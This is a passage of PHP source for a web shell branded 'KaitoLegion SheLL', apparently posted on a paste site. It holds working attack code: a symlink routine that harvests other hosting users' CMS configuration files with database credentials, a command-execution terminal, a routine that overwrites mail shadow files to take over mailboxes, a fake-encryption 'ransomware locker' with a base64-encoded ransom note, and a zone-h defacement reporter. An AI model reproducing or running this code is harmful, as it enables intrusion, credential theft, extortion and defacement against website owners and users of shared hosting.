  797. &nbsp;&nbsp;
  798. <a class='share' id='lbtn' onclick='myFunction()'>
  799. <i style='color:cyan; font-size:22px;' class='fa fa-share'></i>
  800. </a>
  801.  
  802. ";
  803. echo "<br><br><input type='submit' value='Decode'></form>";
  804.  
  805. }
  806.  
  807. // no redirect function
  808.  
  809. function stripFile($in){
  810. $pieces = explode("/", $in);
  811. if(count($pieces) < 4) return $in . "/";
  812. if(strpos(end($pieces), ".") !== false){
  813. array_pop($pieces);
  814. }elseif(end($pieces) !== ""){
  815. $pieces[] = "";
  816. }
  817. return implode("/", $pieces). "/";
  818. }
  819.  
  820. // Function
  821. function url_get_contents($url) {
  822. if (function_exists('curl_exec')){
  823. $conn = curl_init($url);
  824. curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, true);
  825. curl_setopt($conn, CURLOPT_FRESH_CONNECT, true);
  826. curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
  827. $url_get_contents_data = (curl_exec($conn));
  828. curl_close($conn);
  829. }elseif(function_exists('file_get_contents')){
  830. $url_get_contents_data = file_get_contents($url);
  831. }elseif(function_exists('fopen') && function_exists('stream_get_contents')){
  832. $handle = fopen ($url, "r");
  833. $url_get_contents_data = stream_get_contents($handle);
  834. }else{
  835. $url_get_contents_data = false;
  836. }
  837. $data = str_replace('<a href="','<a href="'.'http://' . $_SERVER['HTTP_HOST'].$_SERVER["PHP_SELF"].'?url='.stripFile($url),$url_get_contents_data);
  838. $data = str_replace('<head>','<head><base href="'.stripFile($url).'">',$data);
  839. return $data;
  840. }
  841.  
  842.  
  843. //symlinker function
  844. function sym() {
  845. if($_POST["start"]) {
  846. $dir=file("/etc/passwd");
  847. mkdir("rootsec_sym",0755);
  848. chdir("rootsec_sym");
  849. $ht='Options Indexes FollowSymLinks
  850. DirectoryIndex kaito.htm
  851. AddType text/plain .php
  852. AddHandler text/plain .php
  853. Satisfy Any
  854. ';
  855. $file=fopen(".htaccess", "w+");
  856. fwrite($file, $ht);
  857. fclose($file);
  858. $list=["wp-config.php","wp/wp-config.php","WP/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","press/wp-config.php","wordpress/wp-config.php","Wordpress/wp-config.php","blog/wp-config.php","config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","db.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","configuration.php","blog/configuration.php","joomla/configuration.php","cms/configuration.php","portal/configuration.php","news/configuration.php","home/configuration.php","www/configuration.php","site/configuration.php","sites/configuration.php","vb/includes/config.php","whm/configuration.php","central/configuration.php","whm/whmcs/configuration.php","whm/WHMCS/configuration.php","whmc/WHM/configuration.php","whmcs/configuration.php","support/configuration.php","submitticket.php","whm/configuration.php","drupal/sites/default/settings.php","drupal7/sites/default/settings.php","sites/default/settings.php"];
  859. foreach($dir as $users) {
  860. $user=explode(":",$users);
  861. foreach($list as $confurl) {
  862. symlink("/home/".$user[0]."/public_html/".$confurl,$user[0]."~".$confurl.".txt");
  863. }
  864. }
  865. echo "<p><a href='rootsec_sym' target='_blank'>Click Here</a></p>";
  866. }
  867. }
  868. function terminal($cmd){
  869. echo '<p style="font-style:italic; color:red;">';
  870. @system($cmd.' 2>&1',$res);
  871. $len=count($res);
  872. for($x=0;$x<$len;$x++) {
  873. echo $res[$x].'<br>';
  874. }
  875. echo '</p>';
  876. }
  877. //smtp cracker function
  878. function smtp() {
  879. if($_POST["crack"]) {
  880. $usr=get_current_user();
  881. $pass="rootsec";
  882. $pwd=crypt($pass,'$6$roottn$');
  883. $maindir="/home/".$usr."/etc/";
  884. chdir($maindir);
  885. $dir=scandir($maindir);
  886. foreach($dir as $dirs) {
  887. if($dirs!="." && $dirs!="..") {
  888. chdir($dirs);
  889. if(is_readable(shadow)) {
  890. link("shadow","shadow.bak3x");
  891. $get=file_get_contents("shadow");
  892. $email=explode(":",$get);
  893. $mailname=$email[0];
  894. unlink("shadow");
  895. $file=fopen("shadow","a");
  896. fwrite($file,$mailname.":".$pwd.":16249:::::"."\r\n");
  897. fclose($file);
  898. echo "<p>".$dirs."|25|".$mailname."@".$dirs."|".$pass."</p>";
  899. }
  900. }
  901. }
  902. }
  903. }
  904.  
  905. // Ransomware Locker
  906. function ran($locker,$path,$file){
  907.  
  908. switch($locker){
  909. case '1':
  910. $s = glob("*.*");
  911. $scan = scandir($s);
  912. foreach($scan as $object){
  913. if($object != "." && $object != ".." && $object != "$file"){
  914. if(unlink(".htaccess")){
  915. echo "<p>.htaccess (default)</p>";
  916. }
  917. $x = file_get_contents($object);
  918. $output = base64_encode($x);
  919. $open = fopen("$object.Encrypted","w");
  920. fwrite($open,"$output");
  921. if($object != "$file"){
  922. unlink($object);
  923. }
  924. echo "<p>$object -> Encrypted</p>";
  925. }
  926. }
  927. $mess = base64_decode("PGh0bWw+CjxoZWFkPgo8dGl0bGU+QWxsIFlvdXIgRmlsZXMgQXJlIEVuY3J5cHRlZDwvdGl0bGU+CiA8bGluayBocmVmPSdodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9U2FycGFuY2h8VGVrbycgcmVsPSdzdHlsZXNoZWV0Jz4KPHN0eWxlPgoqIHsKICBmb250LWZhbWlseTpTYXJwYW5jaDsKfQpib2R5IHsKICAgYmFja2dyb3VuZDpibGFjazsKfQpzcGFuIHsKICBjb2xvcjpjeWFuOwp9CnB7CiAgY29sb3I6d2hpdGU7CiAgZm9udC13ZWlnaHQ6Ym9sZDsKfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5Pgo8Y2VudGVyPgo8aW1nIHNyYz0naHR0cHM6Ly9pLmliYi5jby9WbXQxWXl4LzIwMTkxMTA1LTExNTEzNy5qcGcnIHdpZHRoPSczMDBweCcgaGVpZ2h0PSczMDBweCc+CjxoMT48c3Bhbj5Zb3VyIFdlYnNpdGUgSGFzIEJlZW4gRW5jcnlwdGVkIDxicj4gSGFja2VkIEJ5IFBpbm95IFJvb3RTZWM8L3NwYW4+PC9oMT48YnI+CjxwPjxzcGFuPldoYXQgSGFwcGVuZWQgdG8gWW91ciBXZWJzaXRlPzwvc3Bhbj48YnI+PGJyPgpZb3VyIGltcG9ydGFudCB3ZWJzaXRlIGZpbGUgaXMgZW5jcnlwdGVkLiAKTWFueSAucGhwLCAuY3NzLCAuanMsIGFuZCBvdGhlcnMgZmlsZXMgYXJlIG5vIGxvbmdlciBhY2Nlc3NpYmxlIGJlY2F1c2UgdGhleSBhcmUgZW5jcnlwdGVkLiAKTWF5YmUgeW91IGFyZSBidXN5IGxvb2tpbmcgZm9yIHdheXMgdG8gcmVjb3ZlciB5b3VyIGZpbGVzLCAKYnV0IGRvbid0IHdhc3RlIHlvdXIgdGltZSEgCk5vIG9uZSBjYW4gZGVjcnlwdCB5b3VyIGZpbGVzIHdpdGhvdXQgb3VyIHNwZWNpYWwgZGVjcnlwdGlvbiBzZXJ2aWNlLjxicj48YnI+PHNwYW4+CkRvbid0IFRyeSB0byBEZWNyeXB0IFRoZW1zZWx2ZXMsIE9yIFlvdXIgRmlsZXMgV2lsbCBCZSBBdXRvbWF0aWNhbGx5IERlbGV0ZWQuIDwvc3Bhbj48YnI+PGJyPgpIb3cgZG8geW91IHJlc3RvcmUgeW91ciB3ZWJzaXRlPyAKT2YgY291cnNlLCB3ZSBjYW4gcmVjb3ZlciBhbGwgeW91ciBmaWxlcyBzYWZlbHkgYW5kIGVhc2lseS4gQnV0IHlvdSBkb24ndCBoYXZlIGVub3VnaCB0aW1lLgp3ZSBjYW4gc2FmZWx5IGRlY3J5cHQgYWxsIHlvdXIgd2Vic2l0ZSBmaWxlcywgaG93IGRvIHlvdSBkbyB0aGF0PyBZb3UgTXVzdCBDb250YWN0IFVzIGFuZCBQYXkuPGJyPjxhIHN0eWxlPSd0ZXh0LWRlY29yYXRpb246bm9uZTsgY29sb3I6Y3lhbjsnIGhyZWY9J2h0dHBzOi8vZmFjZWJvb2suY29tL3Bpbm95cm9vdHNlYy5nb3YucGgnPHNwYW4+d3d3LmZhY2Vib29rLmNvbS9waW5veXJvb3RzZWM8L3NwYW4+PC9hPgo8YnI+PGJyPgpJZiBZb3UgSGF2ZSBQYWlkIFRoZW4gQWxsIFdlYnNpdGUgRGF0YWJhc2UgRmlsZXMgV2lsbCBBdXRvbWF0aWNhbGx5IFJldHVybiBUbyBOb3JtYWwuPC9wPgo8L2NlbnRlcj4KPC9ib2R5Pgo8L2h0bWw+Cg==");
  928. if(fwrite(fopen("index.html","w"),$mess) && fwrite(fopen(".htaccess","w"),"DirectoryIndex index.html\r\nErrorDocument 404 /index.html")){
  929. }
  930. break;
  931. case '2':
  932. $scandir = glob("*.Encrypted");
  933. foreach($scandir as $ob){
  934. if(unlink("index.html") && unlink(".htaccess")){
  935. echo "<p>index.html (default)</p>";
  936. echo "<p>.htaccess (default)</p>";
  937. }
  938. $f = file_get_contents($ob);
  939. $v = base64_decode($f);
  940. $o = str_replace(".Encrypted","",$ob);
  941. fwrite(fopen($o,"w"),$v);
  942. if(unlink($ob)){
  943. echo "<p>$ob <= Decrypted</p>";
  944. }
  945. }
  946. }
  947. }
  948. function makefile($path,$fname,$fscript){
  949. $x = fopen("$path/$fname","w");
  950. fwrite($x,$fscript);
  951. fclose($x);
  952. }
  953. function delete($dir){
  954. $scandir = scandir($dir);
  955. foreach($scandir as $object){
  956. if($object != "." && $object != ".."){
  957. unlink($dir.DIRECTORY_SEPARATOR.$object);
  958. }
  959. }
  960. @rmdir($dir);
  961. }
  962. /* File Table */
  963. function home($path){
  964. /* Delete */
  965. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  966. if($_POST['type'] == 'dir'){
  967. $dir = $_POST['path'];
  968. @delete($dir);
  969.  
  970. }
  971. elseif($_POST['type'] == 'file'){
  972. if(unlink($_POST['path'])){
  973. echo "<p style='color:cyan; font-size:15px;'>Deleted Done</p>";
  974. } else{
  975. echo "<body onload=alert('Can\'t Delete file')>";
  976. }
  977. }
  978. }
  979. echo "
  980. <table align='center'>
  981. <tr style='background:cyan; font-weight:bold; color:black;'>
  982. <td><center>Name</center></td>
  983. <td><center>Size</center></td>
  984. <td><center>Permissions</center></td>
  985. <td><center>Options</center></td>
  986. </tr>";
  987. echo "<tr>
  988. <td>..</td>
  989. <td><center>--</center></td>
  990. <td><center>";
  991.  
  992. if(is_writable($path.'/'.$file)) echo '<p style="color:cyan;">';
  993. elseif(!is_readable($path.'/'.$file)) echo '<p style="color:red;">';
  994. echo perms($path.'/'.$file);
  995. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</p>';
  996.  
  997. echo "</center></td>
  998. <td><center>";
  999. $v = $_SERVER['PHP_SELF'];
  1000. echo "<p style='margin-top:10px;'>";
  1001. echo "<a href='$v?dir=$path&folder=createfile' style='padding-right:4px; font-size:15px; border:2px solid white;'>+File</a> ";
  1002. echo "<a href='$v?dir=$path&folder=createfolder' style='padding-right:4px; font-size:15px; border:2px solid white;'>+Folder</a></p>";
  1003. echo "</center></td></tr>";
  1004. $scandir = scandir($path);
  1005. foreach($scandir as $dir){
  1006. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  1007. echo "<tr>";
  1008. echo "<td><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a style='color:cyan;' href=\"?dir=$path/$dir\">$dir</a></td>";
  1009. echo "
  1010. <td><center>--</center></td>
  1011. <td><center>";
  1012. if(is_writable($path.'/'.$file)) echo '<p style="color:cyan;">';
  1013. elseif(!is_readable($path.'/'.$file)) echo '<p style="color:red;">';
  1014. echo perms($path.'/'.$file);
  1015. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</p>';
  1016. echo "</center></td>";
  1017. /*** Directory Option ***/
  1018. echo "<td><center>
  1019. <form method=\"POST\" action=\"?option&dir=$path\">
  1020. <select name=\"opt\">
  1021. <option value=\"\">Select</option>
  1022. <option value=\"delete\">Delete</option>
  1023. <option value=\"chmod\">Chmod</option>
  1024. <option value=\"rename\">Rename</option>
  1025. </select>
  1026. <input type=\"hidden\" name=\"type\" value=\"dir\">
  1027. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  1028. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  1029. <input type=\"submit\" value=\">\" />
  1030. </form></center></td>";
  1031. echo "</tr>";
  1032.  
  1033. }
  1034. /********/
  1035.  
  1036. echo "<tr style='background:cyan;'><td></td><td></td><td></td><td></td></tr>";
  1037. foreach($scandir as $file){
  1038. if(!is_file("$path/$file")) continue;
  1039. $size = filesize("$path/$file")/1024;
  1040. $size = round($size,3);
  1041. if($size >= 1024){
  1042. $size = round($size/1024,2).' MB';
  1043. }else{
  1044. $size = $size.' KB';
  1045. }
  1046.  
  1047. echo "<tr>";
  1048. echo "<td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a style='color:cyan;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>";
  1049. echo "<td><center>$size</center></td>
  1050. <td><center>";
  1051. if(is_writable($path.'/'.$file)) echo '<p style="color:cyan;">';
  1052. elseif(!is_readable($path.'/'.$file)) echo '<p style="color:red;">';
  1053. echo perms($path.'/'.$file);
  1054. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</p>';
  1055. echo "</center></td>";
  1056.  
  1057. /*** File Option ***/
  1058.  
  1059. echo "<td><center>
  1060. <form method=\"POST\" action=\"?option&dir=$path\">
  1061. <select name=\"opt\">
  1062. <option value=\"\">Select</option>
  1063. <option value=\"delete\">Delete</option>
  1064. <option value=\"chmod\">Chmod</option>
  1065. <option value=\"rename\">Rename</option>
  1066. <option value=\"edit\">Edit</option>
  1067. </select>
  1068. <input type=\"hidden\" name=\"type\" value=\"file\">
  1069. <input type=\"hidden\" name=\"name\" value=\"$file\">
  1070. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  1071. <input type=\"submit\" value=\">\" />
  1072. </form></center></td>";
  1073. echo "</tr>";
  1074. /********/
  1075. }
  1076. echo "</table>";
  1077. /******Closed******/
  1078. }
  1079.  
  1080. function zoneh(){
  1081. echo "
  1082. <form method='post'>
  1083. <label style='background:cyan; width:100px; border-radius:5px; color:black; font-weight:bold;'>Defacer:</label><br>
  1084. <input style='width:500px; background:black; color:cyan; font-weight:bold; border:2px solid white; outline:none;' type='text' name='defacer' placeholder='Defacer Name'>
  1085. <br>
  1086. <label style='background:cyan; width:100px; border-radius:5px; color:black; font-weight:bold;'>Domain:</label><br>
  1087. <textarea name='defsites' placeholder='Domains' style='width:500px; height:200px; background:black; color:cyan; font-weight:bold; border:2px solid white; outline:none;'></textarea>
  1088. <br>
  1089. <input value='Mirror' style='width:100px;' type='submit' name='submit'>
  1090. </form>
  1091. ";
  1092. $go = $_POST['submit'];
  1093. $defsites = explode("\r\n", $_POST['defsites']);
  1094. $defacer = $_POST['defacer'];
  1095. if (!empty($defsites) && ($defacer)){
  1096. $site = 'http://www.zone-h.com/notify/single';
  1097. $url = curl_init($site);
  1098. curl_setopt($url, CURLOPT_RETURNTRANSFER,1);
  1099. curl_setopt($url, CURLOPT_POST,1);
  1100. curl_setopt($url, CURLOPT_POSTFIELDS, 'defacer=$defacer&domain1=$defsites&hackmode=1&reason=1');
  1101. $res = curl_exec($url);
  1102. if($go){
  1103. foreach($defsites as $urls){
  1104. if(preg_match("/OK/",$res)){
  1105. echo "<h1>$urls -> OK</h1><br>";
  1106. } else if(preg_match("/ERROR/",$res)){
  1107. echo "<h1 style='color:red;'>$urls -> Error<br></h1>";
  1108. }
  1109. }
  1110. }
  1111. else {
  1112. echo "<h1 style='color:red;'>Empty Please try again</h1>";
  1113. }
  1114. }
  1115. }
  1116. copyright();
  1117. function copyright(){
  1118. echo "<br><br><h1>Copyright &copy; KaitoLegion SheLL </h1>";
  1119. echo '<a style="color:white; margin-right:15px;" class="logo" href="http://t.me/KaitoLegion"><i class="fab fa-telegram"></i></a>
  1120. <a style="color:white; margin-right:15px;" class="logo" href="https://github.com/KaitoLegion">
  1121. <i class="fab fa-github"></i>
  1122. </a>
  1123. <a style="color:white; margin-right:15px;" class="logo" href="https://www.youtube.com/KaitoLegion">
  1124. <i class="fab fa-youtube"></i>
  1125. </a>
  1126. <a style="color:white; margin-right:15px;" class="logo" href="https://www.google.com/search?q=Hacked+By+Mr.KaitoX">
  1127. <i class="fab fa-google"></i>
  1128. </a>
  1129. <a style="color:white; margin-right:15px;" class="logo" href="https://facebook.com/KaitoLegionOfficial">
  1130. <i class="fab fa-facebook"></i>
  1131. </a>';
  1132. }
  1133.  
  1134. echo "</html>";
  1135. function perms($file){
  1136. $perms = fileperms($file);
  1137. if (($perms & 0xC000) == 0xC000) {
  1138. $info = 's';
  1139. } elseif (($perms & 0xA000) == 0xA000) {
  1140. $info = 'l';
  1141. } elseif (($perms & 0x8000) == 0x8000) {
  1142. $info = '-';
  1143. } elseif (($perms & 0x6000) == 0x6000) {
  1144. $info = 'b';
  1145. } elseif (($perms & 0x4000) == 0x4000) {
  1146. $info = 'd';
  1147. } elseif (($perms & 0x2000) == 0x2000) {
  1148. $info = 'c';
  1149. } elseif (($perms & 0x1000) == 0x1000) {
  1150. $info = 'p';
  1151. } else {
  1152. $info = 'u';
  1153. }
  1154. $info .= (($perms & 0x0100) ? 'r' : '-');
  1155. $info .= (($perms & 0x0080) ? 'w' : '-');
  1156. $info .= (($perms & 0x0040) ?
  1157. (($perms & 0x0800) ? 's' : 'x' ) :
  1158. (($perms & 0x0800) ? 'S' : '-'));
  1159. $info .= (($perms & 0x0020) ? 'r' : '-');
  1160. $info .= (($perms & 0x0010) ? 'w' : '-');
  1161. $info .= (($perms & 0x0008) ?
  1162. (($perms & 0x0400) ? 's' : 'x' ) :
  1163. (($perms & 0x0400) ? 'S' : '-'));
  1164. $info .= (($perms & 0x0004) ? 'r' : '-');
  1165. $info .= (($perms & 0x0002) ? 'w' : '-');
  1166. $info .= (($perms & 0x0001) ?
  1167. (($perms & 0x0200) ? 't' : 'x' ) :
  1168. (($perms & 0x0200) ? 'T' : '-'));
  1169. return $info;
  1170. }
  1171. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!